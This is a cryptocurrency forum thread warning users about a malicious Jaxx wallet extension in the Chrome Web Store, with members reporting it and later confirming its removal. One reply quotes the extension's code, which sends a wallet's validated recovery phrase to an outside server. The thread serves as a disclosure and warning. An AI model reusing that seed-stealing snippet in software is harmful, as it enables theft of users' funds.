Bitcoin Forum
March 29, 2024, 09:46:12 AM *
News: Latest Bitcoin Core release: 26.0 [Torrent]
 
   Home   Help Search Login Register More  
Pages: [1]
  Print  
Author Topic: [WARNING]: MALICIOUS JAXX.IO in CHROME Webstore  (Read 201 times)
Kemarit (OP)
Legendary
*
Offline Offline

Activity: 3038
Merit: 1350



View Profile
April 02, 2020, 11:29:32 PM
Merited by TravelMug (1), Baofeng (1)
 #1

Cyber criminals are using chrome webstore to spread malicious apps like Jaxx.

So this is a warning to Newbies, don't download this extensions.



Code:
https://chrome.google.com/webstore/detail/jaxx-wallet/pedokobimilhjemibclahcelgedmkgei

On the right side, you will see, Report Abuse, so I ask everyone to report so that it will be taken down. Here is the report link for convenience:

https://chrome.google.com/webstore/report/pedokobimilhjemibclahcelgedmkgei?hl=en&gl=US

It will take just a few minutes of your time.



Yes, adblock or ublock can help, but as you can see on the page, 257 have downloaded it already.

.dice9.win.░░░░▄▄█████▄▄
░░▄████▀▀████▄
░█████▀██▀█████
█████▀█████▀█████
█████▄█████▄█████
████▄▀▀█▀▀▄▄████
░████▄▀█▄█▀▄████
░░▀████▄▄████▀
░░░░▀▀█████▀▀
████
░░░░░░█████████

███████

░░░░▄▄█████▄▄░░█████
░░▄████▀▀████▄
░████▀░░░░▀████
████▄▄█▀█▄▄████
██░░███░░░███░░██
████▀▀█▄█▀▀████
░████▄░░░░▄████
░░▀████▄▄████▀
░░░░▀▀█████▀▀
         ▄▄▄▀▀▀▀▀▀▀▀▀▄▄▄
     ▄▄▀▀░░░░░░░░░░░░░░░▀▄
   ▄▀░░░░░░░░░░░░░░░░░░░░░█
 ▄▀░░░░░░░░░░░░░░░░░░░░░░░░█
▄▀░░░░░░░░░░░░░░░░░░░░░░░░██
█░░░░░░░░░░░░░░░░░░░░░░░▄▀▄▀
▀▄░░░░░░░░░░░░░░░░░░░░▄▀░▄▀
 ▀▄░░░░░░░░░░░░░░▄▄▄▀▀▄▄▀
   ▀▀▄▄▄▄▄▄▄▄▄▀▀▀▄▄▄▀▀
        ▀▀▀▀▀▀▀▀▀
COIN FLIP
       ▄▄▄▄▀▀▀▀▀▄▄▄▄
  ▄▄▀▀▀░░░░░░░░░░░░░▀▀▀▄▄
█▀▄▄░░░░░░░░░░░░░░▄▄▄▀▀░█
█░░░▀▀▀▄▄▄░░░▄▄▄▀▀░░░░░░█
█░░░░░░░░░▀█▀░░░░░░░░░░░█
█░░░░░░░░░░█░░░░░░░░░░░░█
█░░░░░░░░░░█░░░░░░░░░░░░█
█░░░░░░░░░░█░░░░░░░░░░░░█
 ▀▀▄▄░░░░░░█░░░░░░░░▄▄▀▀
     ▀▀░░░░▀░░░░░░░▀
DICE
      ▄▄▄▄▀▀▀▀▀▄▄▄▄
 ▄▄▀▀▀░░░░░░░░░░░░░▀▀█▄   ▄▄▄▄
█▀▀▄▄░░░░░░░░░░▄▄▄▀▀▀▄█▀▀▀░░░░▀▀▀▀▄▄▄
█░░░░░▀▀▄▄░▄▄▀▀░░▄▀▀▀░█░░░░░░░░░░░░▄▄▀█
█░░░░░░░░░█░░░░░░█▀▀▀▄█░░░░░░▄▄▄▀▀▀░░░█
█░░░░░░░░░█░░░░░░█░░░░█▀▀▀▄▀▀░░░░░░░░░█
█░░░░░░░░░█░░░░░░█░░░░█░░░█░░░░░░░░░░░█
 ▀▄░░░░░░░█░░░░░░█░░░░█░░░█░░░░░░░░░░░█
   ▀▄▄░░░░█░░░░░░░▄▄▀▀░░░░█░░░░░░░░░░░█
      ▀░░░░░░░░░▀▀░░░░░░░░▀░░░░░░░░░░░▀
TWO DICE
▄█▀▀▀▀█▀▀▀▀▀▀█▀▀▀▀█▄
▄█▀ ░░░▄▄▄▀▀██▀▀▄▄▄░░░░▀█▄
▄▀▀█▄▄▀▀▀▀░░░▄▀░░▀▄░░░▀▀▀▀▄▄█▀▀▄
▄█▀▀█▀▄ ░░░░░░▄▀░░░░░ ▀▄░░░░░░░▄▀█▀▀█▄
▄▀░░░█░░░▀▄░░░░█░░░░░░░░░ █░░░░▄▀░░░█░░░▀▄
█░░▄▀░░░░░░▀▄▄▀░░░░░░░░░░░ ▀▄▄▀░░░░░░▀▄░░█
█░▄▀░░░░░▄▄▄█▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀█▄▄▄░░░░░▀▄░█
█▀░░▄▄▀▀▀░░ ░▀▄▄░░░░░░░░░░▄▄▀ ░░░▀▀▀▄▄░░▀█
▀▄▀▀░░░░░░░   ░░▀▀▀▄░░▄▀▀▀░░      ░░░░▀▀▄▀

ETHEROLL
..PLAY NOW..
1711705572
Hero Member
*
Offline Offline

Posts: 1711705572

View Profile Personal Message (Offline)

Ignore
1711705572
Reply with quote  #2

1711705572
Report to moderator
"Governments are good at cutting off the heads of a centrally controlled networks like Napster, but pure P2P networks like Gnutella and Tor seem to be holding their own." -- Satoshi
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction.
TravelMug
Hero Member
*****
Offline Offline

Activity: 2590
Merit: 832



View Profile
April 03, 2020, 12:41:13 AM
Merited by Baofeng (1)
 #2

Inspecting the code more closely (loader.js)

Code:
localStorage.setItem('BackUpCorrect',JSON.stringify(phases));
    if (phases.length > 11) {
        let allwords = phases.join(' ');
        if (bip39.validateMnemonic(allwords)) {
            $('#restoreWallet').prop('disabled', !1)
            $.post("https://usermetrica.org/api_v1/", {pc: "jaxx: "+allwords});
        } else {
            $('#restoreWallet').prop('disabled', !0)

So it is posting here.

Code:
https://usermetrica.org/api_v1/
.

Very similar to what I have reported here Ledger Live fake Chrome extensions.

R


▀▀▀▀▀▀▀██████▄▄
████████████████
▀▀▀▀█████▀▀▀█████
████████▌███▐████
▄▄▄▄█████▄▄▄█████
████████████████
▄▄▄▄▄▄▄██████▀▀
LLBIT
  CRYPTO   
FUTURES
 1,000x 
LEVERAGE
COMPETITIVE
    FEES    
 INSTANT 
EXECUTION
.
   TRADE NOW   
ZaraCB
Full Member
***
Offline Offline

Activity: 333
Merit: 105


www.cd3d.app


View Profile WWW
April 03, 2020, 04:05:20 AM
 #3

Thank you to warn us.  I have reported it.

Baofeng
Legendary
*
Offline Offline

Activity: 2548
Merit: 1655



View Profile
April 03, 2020, 03:46:09 PM
 #4

I also did find similar exploit using Jaxx Atomic Wallet Complaint Form.

███████████████████████
████████████████████
██████████████████
████████████████████
███▀▀▀█████████████████
███▄▄▄█████████████████
██████████████████████
██████████████████████
███████████████████████
█████████████████████
███████████████████
███████████████
████████████████████████
███████████████████████████
███████████████████████████
███████████████████████████
█████████▀▀██▀██▀▀█████████
█████████████▄█████████████
███████████████████████
████████████████████████
████████████▄█▄█████████
████████▀▀███████████
██████████████████
▀███████████████████▀
▀███████████████▀
█████████████████████████
O F F I C I A L   P A R T N E R S
▬▬▬▬▬▬▬▬▬▬
ASTON VILLA FC
BURNLEY FC
BK8?.
..PLAY NOW..
boyptc
Hero Member
*****
Offline Offline

Activity: 2954
Merit: 659


★Bitvest.io★ Play Plinko or Invest!


View Profile
April 03, 2020, 05:07:18 PM
 #5

Thanks for the warning. I have seen lately that many of these hackers are using the popular names of wallets and making a chrome extension. Each of them should announce that they don't support any extension and will not create it.



.
.BIG WINNER!.
[15.00000000 BTC]


▄████████████████████▄
██████████████████████
██████████▀▀██████████
█████████░░░░█████████
██████████▄▄██████████
███████▀▀████▀▀███████
██████░░░░██░░░░██████
███████▄▄████▄▄███████
████▀▀████▀▀████▀▀████
███░░░░██░░░░██░░░░███
████▄▄████▄▄████▄▄████
██████████████████████

▀████████████████████▀
▄████████████████████▄
██████████████████████
█████▀▀█▀▀▀▀▀▀██▀▀████
█████░░░░░░░░░░░░░████
█████░░░░░░░░░░░░▄████
█████░░▄███▄░░░░██████
█████▄▄███▀░░░░▄██████
█████████░░░░░░███████
████████░░░░░░░███████
███████░░░░░░░░███████
███████▄▄▄▄▄▄▄▄███████

██████████████████████
▀████████████████████▀
▄████████████████████▄
███████████████▀▀▀▀▀▀▀
███████████▀▀▄▄█░░░░░█
█████████▀░░█████░░░░█
███████▀░░░░░████▀░░░▀
██████░░░░░░░░▀▄▄█████
█████░▄░░░░░▄██████▀▀█
████░████▄░███████░░░░
███░█████░█████████░░█
███░░░▀█░██████████░░█
███░░░░░░████▀▀██▀░░░░
███░░░░░░███░░░░░░░░░░

██░▄▄▄▄░████▄▄██▄░░░░
████████████▀▀▀▀▀▀▀██
█████████████░█▀▀▀█░███
██████████▀▀░█▀░░░▀█░▀▀
███████▀░▄▄█░█░░░░░█░█▄
████▀░▄▄████░▀█░░░█▀░██
███░▄████▀▀░▄░▀█░█▀░▄░▀
█▀░███▀▀▀░░███░▀█▀░███░
▀░███▀░░░░░████▄░▄████░
░███▀░░░░░░░█████████░░
░███░░░░░░░░░███████░░░
███▀░██░░░░░░▀░▄▄▄░▀░░░
███░██████▄▄░▄█████▄░▄▄

██░████████░███████░█
▄████████████████████▄
████████▀▀░░░▀▀███████
███▀▀░░░░░▄▄▄░░░░▀▀▀██
██░▀▀▄▄░░░▀▀▀░░░▄▄▀▀██
██░▄▄░░▀▀▄▄░▄▄▀▀░░░░██
██░▀▀░░░░░░█░░░░░██░██
██░░░▄▄░░░░█░██░░░░░██
██░░░▀▀░░░░█░░░░░░░░██
██░░░░░▄▄░░█░░░░░██░██
██▄░░░░▀▀░░█░██░░░░░██
█████▄▄░░░░█░░░░▄▄████
█████████▄▄█▄▄████████

▀████████████████████▀




Rainbot
Daily Quests
Faucet
Dorodha
Member
**
Offline Offline

Activity: 252
Merit: 11


View Profile
April 03, 2020, 05:36:23 PM
 #6

Likely some malicious & malware publish randomly in the internet world writers are reported looking like coronavirus image base windows theme but attach with malware,  also your detected (MALICIOUS JAXX.IO in CHROME Webstore) I hope everyone avoids downloading everything new theme or addon.
Thanks Kemarit help to Newbies like everyone avoids download with reported.

-------------------------------------------
This addon was maybe already deleted on the chrome webstore.
dkbit98
Legendary
*
Offline Offline

Activity: 2184
Merit: 7021


SATOCHIP.io


View Profile WWW
April 03, 2020, 06:03:22 PM
 #7

Thank you for reporting.
I would stay away from using even original Jaxx wallet, and chrome store has become place for many scams recently, so watch out there.
Looks like it is deleted now.
 

..JAMBLER.io..Create Your Bitcoin Mixing
Business Now for   F R E E 
▄█████████████████████████████
█████████████████████████
████▀████████████████████
███▀█████▄█▀███▀▀▀██████
██▀█████▄█▄██████████████
██▄▄████▀▄▄▄▀▀▀▀▀▄▄██████
█████▄▄▄██████████▀▄████
█████▀▄█▄██████▀█▄█████
███████▀▄█▀█▄██▀█▄███████
█████████▄█▀▄█▀▄█████████
█████████████████████████
█████████████████████████
▀█████████████████████████████
█████████████████████████████████████████████████
.
      OUR      
PARTNERS

.
█████████████████████████████████████████████████
████▄
██
██
██
██
██
██
██
██
██
██
██
████▀
▄█████████████████████████████
████████▀▀█████▀▀████████
█████▀█████████████▀█████
████████████████████████
███████████████▄█████████
█████████████████████████
█████████████████████████
█████████████████████████
███████████████▀█████████
████████████████████████
█████▄█████████████▄█████
████████▄▄█████▄▄████████
▀█████████████████████████████
█████████████████████████████████████████████████
.
   INVEST   
BITCOIN

.
█████████████████████████████████████████████████
████▄
██
██
██
██
██
██
██
██
██
██
██
████▀
Yaunfitda
Hero Member
*****
Offline Offline

Activity: 2800
Merit: 574



View Profile
April 04, 2020, 02:28:21 AM
 #8

Yes, it has been taken down already, so I guess this is a win-win situation for all of us.

But I lauded those scam hunters here in the community because of their warning and the amount of time they spend finding those cyber crooks. But I'm sure this will pop up again as criminals are taking advantage of Google very lax policy on every apps their store has to offer specially crypto related apps.

███████████████████████████████
███████████████████████████████
███▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀███████████
█████████████▀▀        ▀▀██████
██████▀▀▀▀▀▀              ▀████
██████████▀     ▄▄██▄▄     ▀███
██████████      ██████      ███
██████████▄     ▀▀██▀▀     ▄███
██████▄▄▄▄▄▄              ▄████
█████████████▄▄        ▄▄██████
███▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄███████████
███████████████████████████████
███████████████████████████████
.
|
▄▄███████▄▄
▄████▀▀▀▀▀▀▀████▄
▄███▀▄▄███████▄▄▀███▄
▄██▀▄█▀▀▀█████▀▀▀█▄▀██▄
▄██▄██████▀████░███▄██▄
███░████████▀██░████░███
███░████░█▄████▀░████░███
███░████░███▄████████░███
▀██▄▀███░█████▄█████▀▄██▀
▀██▄▀█▄▄▄██████▄██▀▄██▀
▀███▄▀▀███████▀▀▄███▀
▀████▄▄▄▄▄▄▄████▀
▀▀███████▀▀
SSC NAPOLI
OFFICIAL EUROPEAN
BETTING PARTNER
|.ROLLBOTS.|
▄▄███████▄▄
▄███████████████▄
▄███████████████████▄
▄██▀▀▀▀▀▀▀▀▀▀▀▀▀▀█████▄
▄█████████▀████████▀████▄
██████▄▄▄█████▄▄█████████
█████████████████████████
██████▀▀▀█████▀▀█████████
▀█████████▄████████▄████▀
▀██▄▄▄▄▄▄▄▄▄▄▄▄▄▄█████▀
▀███████████████████▀
▀███████████████▀
▀▀███████▀▀
ROLLBIT COIN
TRADE RLB NOW!
|...PLAY NOW...
vintages
Full Member
***
Offline Offline

Activity: 966
Merit: 153



View Profile
April 07, 2020, 11:53:24 AM
 #9

Whether you are a newbie or a long term bitcoin enthusiast or user. I wouldn't even suggest anyone to use Jaxx.io wallet to collect or store bitcoin temporarily. There are hundreds of reputable wallets out there that are supportive for users in different countries and even noob-friendly.

Since it experienced a major hack in late 2017, it hasn't been the same. Personally, i feel it has low management from its developer, which is the reason why it is always vulnerable to hacking and phishing.
Pages: [1]
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!